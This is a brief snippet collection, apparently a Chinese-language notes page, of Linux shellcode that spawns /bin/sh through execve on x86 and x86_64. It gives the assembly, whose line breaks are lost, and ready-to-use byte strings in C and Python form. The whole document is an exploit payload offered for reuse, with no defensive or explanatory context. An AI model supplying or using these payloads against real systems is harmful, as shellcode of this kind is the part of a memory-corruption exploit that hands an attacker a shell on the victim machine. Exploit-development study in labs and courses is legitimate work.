linux exec /bin/sh shellcode x86 and x86_64

x86

xor    %edx,%edxxor    %eax,%eaxpush   %eaxpush   $0x68732f2fpush   $0x6e69622fmov    %esp,%ebxpush   %eaxpush   %ebxmov    %esp,%ecxmov    $0xb,%alint    $0x80

c风格

unsigned char buf[] = "\x33\xd2\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e""\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

python：

buf =  ""buf += "\x33\xd2\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"buf += "\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

x64:

"\x6a\x3b"                        # pushq$0x3b"\x58"                            # pop%rax"\x99"                            # cltd"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"               # mov$0x68732f6e69622f2f, %rbx"\x48\xc1\xeb\x08"                # shr$0x8, %rbx"\x53"                            # push   %rbx"\x48\x89\xe7"                    # mov    %rsp, %rdi"\x52"                            # push%rdx"\x57"                            # push   %rdi"\x48\x89\xe6"                    # mov    %rsp, %rsi"\xb0\x3b"                        # mov$0x3b, %al"\x0f\x05"                        # syscall

C风格

unsigned char buf[] = "\x6a\x3b\x58\x99\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48""\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f""\x05";

python

buf =  ""buf += "\x6a\x3b\x58\x99\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73"buf += "\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89"buf += "\xe6\xb0\x3b\x0f\x05"